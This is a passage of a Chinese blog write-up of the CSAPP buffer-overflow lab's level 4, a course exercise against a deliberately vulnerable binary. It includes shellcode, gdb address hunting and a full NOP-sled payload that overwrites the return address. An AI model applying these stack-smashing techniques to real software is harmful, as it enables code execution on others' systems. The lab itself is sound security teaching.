<p><img src="https://i.loli.net/2021/06/02/luRbIY1AHPQXWME.png" alt="lv3"></p>
<h3 id="lv4-Nitroglycerin"><a href="#lv4-Nitroglycerin" class="headerlink" title="lv4: Nitroglycerin"></a>lv4: Nitroglycerin</h3><p>本阶段需要-n参数运行程序，进入Nitro模式，运行getbufn 函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Buffer size for getbufn */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> KABOOM_BUFFER_SIZE 512</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">getbufn</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> buf[KABOOM_BUFFER_SIZE];</span><br><span class="line">	Gets(buf);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这次定义了缓冲区大小为512。并且该模式下bufbomb程序会申请5次输入的字符串且getn返回5次cookie，每次stack offset都不一样，每一次都必须返回自己的cookie。也就是返回调用5次testn时getn返回5次我们的cookie。</p>
<p>testn反汇编代码一段：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">08048cce &lt;testn&gt;:</span><br><span class="line"> 8048cce:	55                   	push   %ebp</span><br><span class="line"> 8048ccf:	89 e5                	mov    %esp,%ebp</span><br><span class="line"> 8048cd1:	53                   	push   %ebx</span><br><span class="line"> 8048cd2:	83 ec 24             	sub    $0x24,%esp</span><br><span class="line"> 8048cd5:	e8 3e ff ff ff       	call   8048c18 &lt;uniqueval&gt;</span><br><span class="line"> 8048cda:	89 45 f4             	mov    %eax,-0xc(%ebp)</span><br><span class="line"> 8048cdd:	e8 62 05 00 00       	call   8049244 &lt;getbufn&gt;</span><br><span class="line"> 8048ce2:	89 c3                	mov    %eax,%ebx</span><br></pre></td></tr></table></figure>

<p>发现%ebp=%esp+0x28，可以像上一关一样编写汇编代码，首先返回cookie，恢复ebp寄存器，返回testn函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">movl $0x373bea5d,%eax</span><br><span class="line">lea 0x28(%esp),%ebp</span><br><span class="line">push $0x8048ce2</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>同样操作进行反汇编：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">00000000 &lt;.text&gt;:</span><br><span class="line">   0:	b8 5d ea 3b 37       	mov    $0x373bea5d,%eax</span><br><span class="line">   5:	8d 6c 24 28          	lea    0x28(%esp),%ebp</span><br><span class="line">   9:	68 e2 8c 04 08       	push   $0x8048ce2</span><br><span class="line">   e:	c3                   	ret    </span><br></pre></td></tr></table></figure>

<p>现在要确定最后结尾的返回地址，由于每次返回地址都会变化，所以根据指导书所言，进行NOP Slide操作，填充NOP指令。</p>
<p>getbufn函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">08049244 &lt;getbufn&gt;:</span><br><span class="line"> 8049244:	55                   	push   %ebp</span><br><span class="line"> 8049245:	89 e5                	mov    %esp,%ebp</span><br><span class="line"> 8049247:	81 ec 18 02 00 00    	sub    $0x218,%esp</span><br><span class="line"> 804924d:	8d 85 f8 fd ff ff    	lea    -0x208(%ebp),%eax</span><br><span class="line"> 8049253:	89 04 24             	mov    %eax,(%esp)</span><br><span class="line"> 8049256:	e8 d7 f9 ff ff       	call   8048c32 &lt;Gets&gt;</span><br><span class="line"> 804925b:	b8 01 00 00 00       	mov    $0x1,%eax</span><br><span class="line"> 8049260:	c9                   	leave  </span><br><span class="line"> 8049261:	c3                   	ret    </span><br></pre></td></tr></table></figure>

<p>其中第五行告诉我们需要填充NOP指令的字节数应该为0x208+0x04=524个，然后确定返回地址位置，gdb调试查看读入字符串的首地址，由于要读取五次，所以查看五次。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">(gdb) break *0x8049253</span><br><span class="line">Breakpoint 1 at 0x8049253</span><br><span class="line">(gdb) r -n -u sekla</span><br><span class="line">Starting program: &#x2F;home&#x2F;ubuntu&#x2F;lab3&#x2F;buflab-handout&#x2F;bufbomb -n -u sekla</span><br><span class="line">Userid: sekla</span><br><span class="line">Cookie: 0x373bea5d</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08049253 in getbufn ()</span><br><span class="line">(gdb) i r</span><br><span class="line">eax            0x55682e68	1432890984</span><br><span class="line">ecx            0x3a1a0eb3	974786227</span><br><span class="line">edx            0x55683044	1432891460</span><br><span class="line">ebx            0x1	1</span><br><span class="line">esp            0x55682e58	0x55682e58</span><br><span class="line">ebp            0x55683070	0x55683070</span><br><span class="line">esi            0x55686018	1432903704</span><br><span class="line">edi            0xf30	3888</span><br><span class="line">eip            0x8049253	0x8049253 &lt;getbufn+15&gt;</span><br><span class="line">eflags         0x212	[ AF IF ]</span><br><span class="line">cs             0x73	115</span><br><span class="line">ss             0x7b	123</span><br><span class="line">ds             0x7b	123</span><br><span class="line">es             0x7b	123</span><br><span class="line">fs             0x0	0</span><br><span class="line">gs             0x33	51</span><br><span class="line">(gdb) p&#x2F;x $ebp-0x208</span><br><span class="line">$1 &#x3D; 0x55682e68</span><br><span class="line">(gdb) c</span><br><span class="line">Continuing.</span><br><span class="line">Type string:yoshi</span><br><span class="line">Dud: getbufn returned 0x1</span><br><span class="line">Better luck next time</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08049253 in getbufn ()</span><br><span class="line">(gdb) p</span><br><span class="line">$2 &#x3D; (void *) 0x55682e68</span><br><span class="line">(gdb) p&#x2F;x $ebp-0x208</span><br><span class="line">$3 &#x3D; 0x55682df8</span><br><span class="line">(gdb) c</span><br><span class="line">Continuing.</span><br><span class="line">Type string:yoshi</span><br><span class="line">Dud: getbufn returned 0x1</span><br><span class="line">Better luck next time</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08049253 in getbufn ()</span><br><span class="line">(gdb) p&#x2F;x $ebp-0x208</span><br><span class="line">$4 &#x3D; 0x55682e28</span><br><span class="line">(gdb) c</span><br><span class="line">Continuing.</span><br><span class="line">Type string:ba     </span><br><span class="line">Dud: getbufn returned 0x1</span><br><span class="line">Better luck next time</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08049253 in getbufn ()</span><br><span class="line">(gdb) p&#x2F;x $ebp-0x208</span><br><span class="line">$5 &#x3D; 0x55682df8</span><br><span class="line">(gdb) c</span><br><span class="line">Continuing.</span><br><span class="line">Type string:ka</span><br><span class="line">Dud: getbufn returned 0x1</span><br><span class="line">Better luck next time</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08049253 in getbufn ()</span><br><span class="line">(gdb) p&#x2F;x $ebp-0x208</span><br><span class="line">$6 &#x3D; 0x55682e18</span><br><span class="line">(gdb) c</span><br><span class="line">Continuing.</span><br><span class="line">Type string:sekla</span><br><span class="line">Dud: getbufn returned 0x1</span><br><span class="line">Better luck next time</span><br><span class="line">[Inferior 1 (process 3153) exited normally]</span><br></pre></td></tr></table></figure>

<p>应该找到最大的地址作为返回值，即0x55682e68。</p>
<p>编写level4.txt，NOP机器码应该为90。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90 90</span><br><span class="line">90 90 90 90 90 90 90 90 90</span><br><span class="line">b8 5d ea 3b 37 8d 6c 24 28 68</span><br><span class="line">e2 8c 04 08 c3 68 2e 68 55 0a</span><br></pre></td></tr></table></figure>

<p>由于答案要输入5次，所以每一次结尾都要加上0a换行符，重复5次即可，最后一次不要加0a。</p>
<p>验证：<code>cat level4.txt | ./hex2raw | ./bufbomb -n -u sekla</code></p>
<p><img src="https://i.loli.net/2021/06/03/9IOMdJfcBT2okSV.png" alt="lv4"></p>

    </div>
    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/gdb/" rel="tag"><i class="fa fa-tag"></i> gdb</a>
              <a href="/tags/%E6%B1%87%E7%BC%96/" rel="tag"><i class="fa fa-tag"></i> 汇编</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/05/25/CPP10/" rel="prev" title="C++Primer第10章:泛型算法(1)">
      <i class="fa fa-chevron-left"></i> C++Primer第10章:泛型算法(1)
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/07/10/%E5%B5%8C%E5%85%A5%E5%BC%8F%E6%B5%81%E6%B0%B4%E7%81%AF/" rel="next" title="STC51系列单片机入门与简单代码阅读">
      STC51系列单片机入门与简单代码阅读 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CSAPP-BOMBLAB"><span class="nav-number">1.</span> <span class="nav-text">CSAPP-BOMBLAB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="nav-number">1.1.</span> <span class="nav-text">实验环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9"><span class="nav-number">1.2.</span> <span class="nav-text">实验内容</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pre"><span class="nav-number">1.2.1.</span> <span class="nav-text">pre</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#cookie"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">cookie</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#getbuf"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">getbuf</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#hex2raw"><span class="nav-number">1.2.1.3.</span> <span class="nav-text">hex2raw</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%BF%87%E7%A8%8B%E8%B0%83%E7%94%A8%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.1.4.</span> <span class="nav-text">函数过程调用原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lv0-Candle"><span class="nav-number">1.2.2.</span> <span class="nav-text">lv0.Candle</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lv1-Sparkler"><span class="nav-number">1.2.3.</span> <span class="nav-text">lv1.Sparkler</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lv2-Firecracker"><span class="nav-number">1.2.4.</span> <span class="nav-text">lv2.Firecracker</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lv3-Dynamite"><span class="nav-number">1.2.5.</span> <span class="nav-text">lv3:Dynamite</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lv4-Nitroglycerin"><span class="nav-number">1.2.6.</span> <span class="nav-text">lv4: Nitroglycerin</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Sekla"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Sekla</p>
  <div class="site-description" itemprop="description">Sekla</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ShenTiao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ShenTiao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:584892986@qq.com" title="E-Mail → mailto:584892986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1416875904&auto=0&height=66"></iframe>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sekla</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">288k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.9},"log":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/love.js"></script>
